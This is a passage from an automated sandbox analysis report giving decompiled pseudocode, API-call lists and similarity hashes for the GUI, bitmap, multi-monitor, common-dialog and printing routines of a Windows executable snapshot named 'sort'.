								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
								if(_t342 == 0) {
									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
										E00427C71(_t281, _t249 - 1, 1);
									}
								}
								goto L21;
							}
							_t343 = _t342 + 1;
							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
							_t353 =  *(_t355 - 0x1c);
							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
								_t339 =  *((intOrPtr*)(_t355 + 8));
								continue;
							}
							goto L21;
						}
						_t342 =  *((intOrPtr*)(_t355 - 0x10));
						goto L18;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00427437
GetViewportOrgEx.GDI32(?,?), ref: 00427462
GetSysColor.USER32(00000006), ref: 00427489
CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
GetSysColor.USER32(00000010), ref: 004274B0
CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
GetDeviceCaps.GDI32(?,00000008), ref: 00427563
SetRect.USER32 ref: 00427577
DPtoLP.GDI32(?,?,00000002), ref: 0042758F
Rectangle.GDI32(00000001,769963E0,?,?,?), ref: 0042762D

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5

Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236

GetStockObject.GDI32(00000000), ref: 004276A4
FillRect.USER32 ref: 004276B5

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Strings

(, xrefs: 00427788

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C129, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
				int* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _t37;
				signed int _t42;
				struct HDC__* _t49;
				struct HBITMAP__* _t50;
				intOrPtr* _t60;
				int* _t61;
				int _t66;
				signed int _t69;
				intOrPtr* _t74;
				signed int _t77;
				signed int* _t82;
				int _t83;
				struct HDC__* _t84;
				intOrPtr* _t85;

				_t37 = LoadResource(_a4, _a8);
				if(_t37 == 0) {
					L3:
					return 0;
				}
				_t60 = LockResource(_t37);
				_v12 = _t60;
				if(_t60 == 0) {
					goto L3;
				}
				_t80 =  *_t60 + 0x40;
				_t85 = E00405667( *_t60 + 0x40);
				if(_t85 != 0) {
					E00405700(_t85, _t60, _t80);
					_t82 = _t85 +  *_t85;
					_a8 = 0x10;
					do {
						_t42 =  *_t82;
						_t69 = 0;
						_t74 = 0x42dbc0;
						while(_t42 !=  *_t74) {
							_t74 = _t74 + 8;
							_t69 = _t69 + 1;
							if(_t74 < "DllGetVersion") {
								continue;
							}
							goto L13;
						}
						if(_a12 == 0) {
							_t61 = 0x42dbc4 + _t69 * 8;
							_v8 = _t61;
							GetSysColor( *(0x42dbc4 + _t69 * 8));
							GetSysColor( *_t61);
							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
						} else {
							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
								 *_t82 = 0xffffff;
							}
						}
						L13:
						_t82 =  &(_t82[1]);
						_t14 =  &_a8;
						 *_t14 = _a8 - 1;
					} while ( *_t14 != 0);
					_t83 =  *(_t85 + 4);
					_t66 =  *(_t85 + 8);
					_a4 = _t83;
					_a8 = _t66;
					_t49 = GetDC(0);
					_a12 = _t49;
					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
					_v8 = _t50;
					if(_t50 != 0) {
						_t84 = CreateCompatibleDC(_a12);
						_v16 = SelectObject(_t84, _v8);
						_push(0xcc0020);
						_push(0);
						_push(_t85);
						_t77 = 1;
						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
						SelectObject(_t84, _v16);
						DeleteDC(_t84);
					}
					ReleaseDC(0, _a12);
					E004062E0(_t85);
					return _v8;
				}
				goto L3;
			}

APIs

LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
LockResource.KERNEL32(00000000), ref: 0041C143
GetSysColor.USER32 ref: 0041C1C5
GetSysColor.USER32(00000000), ref: 0041C1D3
GetSysColor.USER32(00000000), ref: 0041C1E3
GetDC.USER32(00000000), ref: 0041C209
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
CreateCompatibleDC.GDI32(00000000), ref: 0041C225
SelectObject.GDI32(00000000,00000000), ref: 0041C237
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
SelectObject.GDI32(00000000,00000000), ref: 0041C270
DeleteDC.GDI32(00000000), ref: 0041C273
ReleaseDC.USER32 ref: 0041C27E

Strings

DllGetVersion, xrefs: 0041C192

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD2, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DD2() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x439620; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x439608 = 0;
						 *0x43960c = 0;
						 *0x439610 = 0;
						 *0x439614 = 0;
						 *0x439618 = 0;
						 *0x43961c = 0;
						 *0x439620 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x439608 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x43960c = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x439610 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x439614 = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x43961c = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x439618 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x439620 = _t11;
					return _t11;
				}
				_t18 =  *0x439618; // 0x0
				return 0 | _t18 != 0x00000000;
			}

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61

Strings

EnumDisplayMonitors, xrefs: 00404E4A
MonitorFromPoint, xrefs: 00404E39
USER32, xrefs: 00404DEF
GetSystemMetrics, xrefs: 00404E06
MonitorFromRect, xrefs: 00404E28
MonitorFromWindow, xrefs: 00404E17
GetMonitorInfoA, xrefs: 00404E5B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042204B, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				int _t61;
				int _t65;
				struct HWND__* _t74;
				struct HWND__* _t79;
				struct HMENU__* _t81;
				struct HWND__* _t84;
				struct HWND__* _t88;
				signed int _t90;
				signed int _t91;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				int _t108;
				intOrPtr* _t117;
				int* _t118;
				intOrPtr* _t119;
				struct HWND__* _t120;

				_t119 = __ecx;
				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
				_t103 = 0;
				_v4 = _t59;
				if(_a4 != 0) {
					_t117 =  *((intOrPtr*)(_t59 + 0x68));
					if(_t117 != 0) {
						 *((intOrPtr*)( *_t117 + 0x5c))(0);
					}
				}
				_t120 =  *(_t119 + 0x70);
				_t118 = _a8;
				_v12 = _t103;
				if(_t120 == _t103) {
					L13:
					_t118[2] = _v12;
					if(_a4 == _t103) {
						 *(_t119 + 0x9c) = _t103;
						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
						__eflags = _t61;
						_a4 = _t61;
						if(_t61 != 0) {
							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
							__eflags = _t74;
							if(_t74 != 0) {
								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
							}
							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
						}
						__eflags = _t118[1];
						if(_t118[1] != 0) {
							InvalidateRect( *(_t119 + 0x1c), 0, 1);
							SetMenu( *(_t119 + 0x1c), _t118[1]);
						}
						_t108 =  *(_v4 + 0x68);
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 0x5c))(1);
						}
						 *((intOrPtr*)( *_t119 + 0xc8))(1);
						_t65 =  *_t118;
						__eflags = _t65 - 0xe900;
						if(_t65 != 0xe900) {
							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
						}
						ShowWindow(_v0, 5);
						 *(_t119 + 0x48) = _t118[5];
						return E00420A8B(1);
					}
					 *(_t119 + 0x9c) = _t118[4];
					E00420A8B(_t103);
					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
					_v0 = _t79;
					ShowWindow(_t79, _t103);
					_t81 = GetMenu( *(_t119 + 0x1c));
					_t118[1] = _t81;
					if(_t81 != _t103) {
						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
						SetMenu( *(_t119 + 0x1c), _t103);
						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
					}
					_t118[5] =  *(_t119 + 0x48);
					 *(_t119 + 0x48) = _t103;
					E0042065C(_t119, 0x7915);
					if( *_t118 == 0xe900) {
						_t84 = _a4;
					} else {
						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
					}
					if(_t84 == 0) {
						return _t84;
					} else {
						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
					}
				} else {
					goto L4;
				}
				do {
					L4:
					_t88 = _t120;
					_t120 = _v0;
					_t106 =  *((intOrPtr*)(_t88 + 8));
					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
					_v8 = _t90;
					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
						_t91 = 1;
						_a8 = _t91 << _t90 - 0xe800;
						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
							_v12 = _v12 | _a8;
						}
						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
						}
					}
				} while (_t120 != 0);
				_t103 = 0;
				goto L13;
			}

APIs

GetDlgCtrlID.USER32 ref: 0042208F
GetDlgItem.USER32 ref: 0042212C
ShowWindow.USER32(00000000,00000000), ref: 00422134
GetMenu.USER32(?), ref: 0042213D
InvalidateRect.USER32(?,00000000,00000001), ref: 00422150
SetMenu.USER32(?,00000000), ref: 0042215A
GetDlgItem.USER32 ref: 00422189
SetWindowLongA.USER32 ref: 004221A1
GetDlgItem.USER32 ref: 004221C0
GetDlgItem.USER32 ref: 004221D3
SetWindowLongA.USER32 ref: 004221E1
SetWindowLongA.USER32 ref: 004221EE
InvalidateRect.USER32(?,00000000,00000001), ref: 00422201
SetMenu.USER32(?,00000000), ref: 0042220D
GetDlgItem.USER32 ref: 0042223B
ShowWindow.USER32(?,00000005), ref: 00422247

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004107DB, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E00425C92(0x4397cc, E0042440D);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E00416433(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x439cb0; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E00413767();
						_t34 = E00416753(_t65, 0x42e898);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x439cbc; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x439cb8; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x439cc0; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x439cb4; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x439c3c;
								if( *0x439c3c != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x439cac = _t49;
					_push(_a12);
					return E00411B77(_t54, _a4, 0x110);
				}
			}

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862

Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462

SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 00410955

Strings

commdlg_help, xrefs: 0041084C
commdlg_SetRGBColor, xrefs: 00410858
commdlg_FileNameOK, xrefs: 00410834
commdlg_LBSelChangedNotify, xrefs: 00410821
commdlg_ShareViolation, xrefs: 00410828
commdlg_ColorOK, xrefs: 00410840

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428103, Relevance: 21.5, APIs: 14, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00428103(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				signed int _t227;
				void* _t228;
				CHAR* _t229;
				intOrPtr _t231;
				CHAR* _t232;
				signed int _t233;
				CHAR* _t242;
				CHAR* _t243;
				CHAR* _t253;
				intOrPtr* _t256;
				intOrPtr _t265;
				signed char _t266;
				intOrPtr _t268;
				int _t290;
				int _t296;
				signed int _t300;
				int _t310;
				void* _t323;
				void* _t335;
				void* _t337;
				intOrPtr _t353;
				struct HDC__* _t355;
				intOrPtr _t357;
				signed char _t383;
				void* _t396;
				signed int _t449;
				intOrPtr* _t452;
				intOrPtr* _t455;
				struct _DOCINFOA _t458;
				void* _t460;
				signed char _t461;
				void* _t463;
				void* _t465;
				void* _t466;
				void* _t468;

				E00406520(E0042A280, _t463);
				_t466 = _t465 - 0x32c;
				_t452 = __ecx;
				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
				E00428824(_t463 - 0x80);
				 *(_t463 - 4) = 0;
				if( *((short*)(E00413672() + 8)) != 0xe108) {
					L6:
					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
					__eflags = _t227;
					if(_t227 != 0) {
						_t229 =  *0x436980; // 0x436994
						 *(_t463 - 0x3c) = _t229;
						 *(_t463 - 4) = 1;
						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						__eflags =  *(_t231 + 0x14) & 0x00000020;
						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
							L12:
							_t232 =  *0x436980; // 0x436994
							 *(_t463 - 0x14) = _t232;
							_t233 =  *(_t452 + 0x3c);
							 *(_t463 - 4) = 0xa;
							__eflags = _t233;
							if(_t233 == 0) {
								E004140EE(E00414C6C(_t452), _t463 - 0x14);
							} else {
								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
							}
							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
							if(__eflags > 0) {
								E00416D10(_t463 - 0x14, __eflags, 0x1f);
							}
							_t458 = 0x14;
							E00406330(_t463 - 0x94, 0, _t458);
							_t468 = _t466 + 0xc;
							 *(_t463 - 0x90) =  *(_t463 - 0x14);
							_t242 =  *0x436980; // 0x436994
							 *(_t463 - 0x94) = _t458;
							 *(_t463 - 0x38) = _t242;
							_t243 =  *(_t463 - 0x3c);
							 *(_t463 - 4) = 0xb;
							__eflags =  *(_t243 - 8);
							if( *(_t243 - 8) != 0) {
								 *(_t463 - 0x8c) = _t243;
								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
								_t460 = 0xf049;
							} else {
								 *(_t463 - 0x8c) = 0;
								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
								 *(_t463 - 4) = 0xc;
								E00416B95(_t463 - 0x38, _t463, _t323);
								 *(_t463 - 4) = 0xb;
								E00416AEC(_t463 - 0x18);
								_t460 = 0xf040;
							}
							E00419B00(_t463 - 0x34);
							__eflags =  *(_t463 - 0x7c);
							 *(_t463 - 4) = 0xd;
							if( *(_t463 - 0x7c) == 0) {
								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
								 *(_t463 - 0x28) = 1;
							}
							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) == 0) {
								SetAbortProc( *(_t463 - 0x30), E00427F7F);
							}
							E004166CE(E00404DAE(), 0);
							_push(_t452);
							E00428772(_t463 - 0xf0, __eflags);
							_t253 =  *0x436980; // 0x436994
							 *(_t463 - 0x20) = _t253;
							 *(_t463 - 4) = 0xf;
							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
							 *(_t463 - 4) = 0x10;
							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
							 *(_t463 - 4) = 0xf;
							E00416AEC(_t463 - 0x18);
							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
							E0041668C(_t463 - 0xf0, 5);
							UpdateWindow( *(_t463 - 0xd4));
